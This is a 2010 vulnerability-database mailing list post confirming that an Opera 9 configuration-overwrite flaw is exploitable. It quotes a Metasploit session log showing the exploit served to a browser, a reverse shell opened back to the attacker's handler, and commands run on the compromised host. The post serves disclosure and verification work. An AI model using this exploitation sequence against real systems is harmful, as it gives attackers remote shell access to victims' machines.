[VIM] opera_configoverwrite.rb
Steve Tornio
steve at vitriol.net
Tue Jul 27 07:30:02 CDT 2010
On Fri, Jul 23, 2010 at 11:44 AM, <dm at securityfocus.com> wrote:
> I talked to someone at Opera and they haven't been able to reproduce
> it in 9.x versions (which it is supposed to affect). They're not sure
> exactly when it was fixed.
>
egypt set up an environment to verify this. It is exploitable on
Fedora Core 5, Opera 9.10.
http://www.pastebin.ca/1909252
msf exploit(opera_configoverwrite) > set ENCODER cmd/generic_sh
ENCODER => cmd/generic_sh
msf exploit(opera_configoverwrite) > rexploit
[*] Stopping existing job...
[*] Server stopped.
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.99.1:4444
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.2.100:8080/
[*] Server started.
msf exploit(opera_configoverwrite) >
[*] Got request /
[*] Sending Opera 9 Configuration Overwrite to 192.168.99.134:56071...
[*] Done with request /
[*] Got request /favicon.ico
[*] 404ing request for /favicon.ico
[*] Command shell session 1 opened (192.168.99.1:4444 ->
192.168.99.134:59644) at 2010-07-27 06:21:11 -0600
msf exploit(opera_configoverwrite) > sessions -i 1
[*] Starting interaction with 1...
id
uid=500(vulnerable) gid=500(vulnerable) groups=500(vulnerable)
context=user_u:system_r:unconfined_t
ps
PID TTY TIME CMD
3097 pts/1 00:00:00 bash
10378 pts/1 00:00:10 opera
10387 pts/1 00:00:00 operapluginwrap <defunct>
10449 pts/1 00:00:00 sh
10451 pts/1 00:00:00 sh
10452 pts/1 00:00:00 sh
10458 pts/1 00:00:00 ps
More information about the VIM
mailing list